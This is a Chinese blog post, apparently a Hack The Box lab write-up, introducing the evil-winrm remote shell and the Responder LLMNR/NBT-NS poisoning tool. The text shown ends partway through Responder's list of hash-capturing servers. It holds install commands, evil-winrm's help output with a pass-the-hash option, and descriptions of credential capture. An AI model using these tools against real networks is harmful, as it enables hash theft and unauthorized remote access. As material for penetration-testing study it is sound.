<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo_32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo_16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha256-xejo6yLi6vGtAjcMIsY8BHdKsLg7QynVlFMzdQgUuy8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"twe1v3.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.12.3","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文仅用作记录学习和总结，文中提到和使用的靶场来自Hack The Box的Responder靶场。">
<meta property="og:type" content="article">
<meta property="og:title" content="Responder与evil-winRM配合远程登录windows">
<meta property="og:url" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/index.html">
<meta property="og:site_name" content="TWe1v3">
<meta property="og:description" content="本文仅用作记录学习和总结，文中提到和使用的靶场来自Hack The Box的Responder靶场。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230806235738164.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807004726426.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010259553.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807005131865.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807005737023.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010014461.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010533593.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807010848902.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012015738.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012128742.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012239477.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807012755978.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807013110709.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807013453353.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807013831906.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807014120801.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807014438379.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807014805570.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807015126775.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807015427827.png">
<meta property="og:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230807015616926.png">
<meta property="article:published_time" content="2023-08-04T16:00:00.000Z">
<meta property="article:modified_time" content="2023-08-06T18:05:23.723Z">
<meta property="article:author" content="TWe1v3">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/image-20230806235738164.png">


<link rel="canonical" href="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":"","permalink":"http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/","path":"2023/08/Responder与evil-winRM配合远程登录windows/","title":"Responder与evil-winRM配合远程登录windows"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Responder与evil-winRM配合远程登录windows | TWe1v3</title>
  





<script src="/lib/fireworks.js"></script>
  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">TWe1v3</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>文章标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>文章分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>时间轴</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于TWe1v3</a></li><li class="menu-item menu-item-friendlink"><a href="/friendlink/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#responder%E4%B8%8Eevil-winrm%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows"><span class="nav-number">1.</span> <span class="nav-text"> Responder与evil-winRM配合远程登录windows</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01evil-winrm"><span class="nav-number">1.1.</span> <span class="nav-text"> 0x01.evil-winRM</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x011%E6%A6%82%E8%BF%B0"><span class="nav-number">1.1.1.</span> <span class="nav-text"> 0x01.1概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x012%E5%AE%89%E8%A3%85%E5%92%8C%E4%BD%BF%E7%94%A8"><span class="nav-number">1.1.2.</span> <span class="nav-text"> 0x01.2安装和使用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%89%E8%A3%85"><span class="nav-number">1.1.2.1.</span> <span class="nav-text"> 安装：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8"><span class="nav-number">1.1.2.2.</span> <span class="nav-text"> 使用:</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02responder"><span class="nav-number">1.2.</span> <span class="nav-text"> 0x02.Responder</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x021-%E6%A6%82%E5%BF%B5"><span class="nav-number">1.2.1.</span> <span class="nav-text"> 0x02.1 概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x022-%E7%89%B9%E6%80%A7"><span class="nav-number">1.2.2.</span> <span class="nav-text"> 0x02.2 特性</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-smb-%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.1.</span> <span class="nav-text"> 内置 SMB 身份验证服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-mssql-%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.2.</span> <span class="nav-text"> 内置 MSSQL 身份验证服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-http-%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.3.</span> <span class="nav-text"> 内置 HTTP 身份验证服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-https-%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.4.</span> <span class="nav-text"> 内置 HTTPS 身份验证服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-ldap-%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.5.</span> <span class="nav-text"> 内置 LDAP 身份验证服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-ftp-pop3-imap-smtp-%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.6.</span> <span class="nav-text"> 内置 FTP、POP3、IMAP、SMTP 身份验证服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-dns-%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.7.</span> <span class="nav-text"> 内置 DNS 服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%AE-wpad-%E4%BB%A3%E7%90%86%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.2.2.8.</span> <span class="nav-text"> 内置 WPAD 代理服务器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9B%91%E5%90%AC%E5%99%A8"><span class="nav-number">1.2.2.9.</span> <span class="nav-text"> 浏览器监听器</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB"><span class="nav-number">1.2.2.10.</span> <span class="nav-text"> 指纹识别</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#icmp-%E9%87%8D%E5%AE%9A%E5%90%91"><span class="nav-number">1.2.2.11.</span> <span class="nav-text"> ICMP 重定向</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B5%81%E6%B0%93-dhcp"><span class="nav-number">1.2.2.12.</span> <span class="nav-text"> 流氓 DHCP</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E6%A8%A1%E5%BC%8F"><span class="nav-number">1.2.2.13.</span> <span class="nav-text"> 分析模式</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x023-responder%E6%AC%BA%E9%AA%97%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.3.</span> <span class="nav-text"> 0x02.3 Responder欺骗原理</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#llmnr"><span class="nav-number">1.2.3.1.</span> <span class="nav-text"> LLMNR</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#nbns"><span class="nav-number">1.2.3.2.</span> <span class="nav-text"> NBNS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#mdns"><span class="nav-number">1.2.3.3.</span> <span class="nav-text"> mDNS</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x024-%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.4.</span> <span class="nav-text"> 0x02.4 使用方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%88%98responder%E4%B8%8Eevil-winrm%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows"><span class="nav-number">1.3.</span> <span class="nav-text"> 0x03 靶场实战–Responder与evil-winRM配合远程登录windows</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%AC%E6%96%87%E7%9A%84%E5%85%B3%E9%94%AE%E6%93%8D%E4%BD%9C%E5%8F%AF%E7%9B%B4%E6%8E%A5%E8%B7%B3%E8%87%B3%E6%AD%A4%E5%A4%84"><span class="nav-number">1.3.1.</span> <span class="nav-text"> 本文的关键操作，可直接跳至此处</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%80%E5%90%8E"><span class="nav-number">1.3.2.</span> <span class="nav-text"> 最后</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="TWe1v3"
      src="/images/twe1v3.jpg">
  <p class="site-author-name" itemprop="name">TWe1v3</p>
  <div class="site-description" itemprop="description">TWe1v3的博客</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">31</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/TWe1v3" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;TWe1v3" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:twe1v3@qq.com" title="E-Mail → mailto:twe1v3@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



        </div>
      </div>

    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://twe1v3.github.io/2023/08/Responder%E4%B8%8Eevil-winRM%E9%85%8D%E5%90%88%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95windows/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/twe1v3.jpg">
      <meta itemprop="name" content="TWe1v3">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TWe1v3">
      <meta itemprop="description" content="TWe1v3的博客">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Responder与evil-winRM配合远程登录windows | TWe1v3">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Responder与evil-winRM配合远程登录windows
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-08-05 00:00:00" itemprop="dateCreated datePublished" datetime="2023-08-05T00:00:00+08:00">2023-08-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-08-07 02:05:23" itemprop="dateModified" datetime="2023-08-07T02:05:23+08:00">2023-08-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">渗透</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>8.5k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>本文仅用作记录学习和总结，文中提到和使用的靶场来自Hack The Box的Responder靶场。</p>
<span id="more"></span>
<h1 id="responder与evil-winrm配合远程登录windows"><a class="markdownIt-Anchor" href="#responder与evil-winrm配合远程登录windows"></a> Responder与evil-winRM配合远程登录windows</h1>
<h2 id="0x01evil-winrm"><a class="markdownIt-Anchor" href="#0x01evil-winrm"></a> 0x01.evil-winRM</h2>
<h3 id="0x011概述"><a class="markdownIt-Anchor" href="#0x011概述"></a> 0x01.1概述</h3>
<p>在使用和介绍Responder之前，先来了解一下<code>evil-winRM</code>:</p>
<p><code>evil-winrm</code>是Windows远程管理(WinRM) Shell的终极版本。</p>
<p>Windows远程管理是WS 管理协议的 Microsoft 实施，该协议是基于标准 SOAP、不受防火墙影响的协议，允许不同供应商的硬件和操作系统相互操作。而微软将其包含在他们的系统中，是为了便于系统管理员在日常工作中，远程管理服务器，或通过脚本同时管理多台服务器，以提高他们的工作效率。</p>
<p>此程序可在启用此功能的任何Microsoft Windows服务器上使用（通常端口为5985），当然只有在你具有使用凭据和权限时才能使用。因此，我们说它可用于黑客攻击的后利用/渗透测试阶段。相对于攻击者来说，这个程序能为他们提供更好更简单易用的功能。当然，系统管理员也可以将其用于合法目的，但其大部分功能都集中于黑客攻击/渗透测试。</p>
<h3 id="0x012安装和使用"><a class="markdownIt-Anchor" href="#0x012安装和使用"></a> 0x01.2安装和使用</h3>
<h4 id="安装"><a class="markdownIt-Anchor" href="#安装"></a> 安装：</h4>
<p>方法一</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install evil-winrm</span><br></pre></td></tr></table></figure>
<p>方法二：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/Hackplayers/evil-winrm.git</span><br></pre></td></tr></table></figure>
<p>方法三：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gem install evil-winrm</span><br></pre></td></tr></table></figure>
<h4 id="使用"><a class="markdownIt-Anchor" href="#使用"></a> 使用:</h4>
<p>首先查看帮助文档</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~# evil-winrm -h</span><br><span class="line"></span><br><span class="line">Evil-WinRM shell v3.5</span><br><span class="line">用法：evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r 领域] [--spn SPN_PREFIX] [-l]</span><br><span class="line">     -S, --ssl 启用 ssl</span><br><span class="line">     -c, --pub-key PUBLIC_KEY_PATH 公钥证书的本地路径</span><br><span class="line">     -k, --priv-key PRIVATE_KEY_PATH 私钥证书的本地路径</span><br><span class="line">     -r, --realm DOMAIN Kerberos auth，还必须使用此格式在 /etc/krb5.conf 文件中设置 -&gt; CONTOSO.COM = &#123; kdc = fooserver.contoso.com &#125;</span><br><span class="line">     -s, --scripts PS_SCRIPTS_PATH Powershell 脚本本地路径</span><br><span class="line">         --spn SPN_PREFIX Kerberos 身份验证的 SPN 前缀（默认 HTTP）</span><br><span class="line">     -e, --executables EXES_PATH C# 可执行文件本地路径</span><br><span class="line">     -i, --ip IP 远程主机IP或主机名。 Kerberos 身份验证的 FQDN（必需）</span><br><span class="line">     -U, --url URL 远程 url 端点（默认 /wsman）</span><br><span class="line">     -u, --user USER 用户名（如果不使用 kerberos，则需要）</span><br><span class="line">     -p, --password PASS 密码</span><br><span class="line">     -H, --hash HASH NTHash</span><br><span class="line">     -P, --port PORT 远程主机端口（默认5985）</span><br><span class="line">     -V, --version 显示版本</span><br><span class="line">     -n, --no-colors 禁用颜色</span><br><span class="line">     -N, --no-rpath-completion 禁用远程路径完成</span><br><span class="line">     -l, --log 记录 WinRM 会话</span><br><span class="line">     -h, --help 显示此帮助消息</span><br></pre></td></tr></table></figure>
<h2 id="0x02responder"><a class="markdownIt-Anchor" href="#0x02responder"></a> 0x02.Responder</h2>
<h3 id="0x021-概念"><a class="markdownIt-Anchor" href="#0x021-概念"></a> 0x02.1 概念</h3>
<p>响应 LLMNR、NBT-NS 和 MDNS 投毒者。 它将根据名称后缀回答特定的 NBT-NS（NetBIOS 名称服务）查询（请参阅：<a target="_blank" rel="noopener" href="http://support.microsoft.com/kb/163409%EF%BC%89%E3%80%82%E9%BB%98%E8%AE%A4%E6%83%85%E5%86%B5%E4%B8%8B%EF%BC%8C%E8%AF%A5%E5%B7%A5%E5%85%B7%E5%B0%86%E4%BB%85%E5%93%8D%E5%BA%94%E9%80%82%E7%94%A8%E4%BA%8E">http://support.microsoft.com/kb/163409）。默认情况下，该工具将仅响应适用于</a> SMB 的文件服务器服务请求。</p>
<h3 id="0x022-特性"><a class="markdownIt-Anchor" href="#0x022-特性"></a> 0x02.2 特性</h3>
<h4 id="内置-smb-身份验证服务器"><a class="markdownIt-Anchor" href="#内置-smb-身份验证服务器"></a> 内置 SMB 身份验证服务器</h4>
<p>默认情况下支持具有扩展安全性 NTLMSSP 的 NTLMv1、NTLMv2 哈希。 已成功测试从 Windows 95 到 Server 2012 RC、Samba 和 Mac OSX Lion。 NT4 支持明文密码，当设置<code>--lm</code>选项时，LM 哈希降级。该工具启动时默认启用此功能。</p>
<h4 id="内置-mssql-身份验证服务器"><a class="markdownIt-Anchor" href="#内置-mssql-身份验证服务器"></a> 内置 MSSQL 身份验证服务器</h4>
<p>为了将 SQL 身份验证重定向到此工具，您需要为 Windows Vista 之前的系统设置选项 -r（用于 SQL Server 查找的 NBT-NS 查询使用工作站服务名称后缀）（LLMNR 将用于 Vista 和 更高）。 该服务器支持 NTLMv1、LMv2 哈希。 此功能已在 Windows SQL Server 2005 和 2008 上成功测试。</p>
<h4 id="内置-http-身份验证服务器"><a class="markdownIt-Anchor" href="#内置-http-身份验证服务器"></a> 内置 HTTP 身份验证服务器</h4>
<p>为了将 HTTP 身份验证重定向到此工具，您需要为早于 Vista 的 Windows 版本设置选项 -r（用于 HTTP 服务器查找的 NBT-NS 查询使用工作站服务名称后缀发送）。 对于 Vista 及更高版本，将使用 LLMNR。 该服务器支持 NTLMv1、NTLMv2 哈希和基本身份验证。 该服务器已在 IE 6 至 IE 10、Firefox、Chrome、Safari 上成功测试。</p>
<p>注意：此模块也适用于从 Windows WebDav 客户端 (WebClient) 发出的 WebDav NTLM 身份验证。 您现在可以将自定义文件发送给受害者。</p>
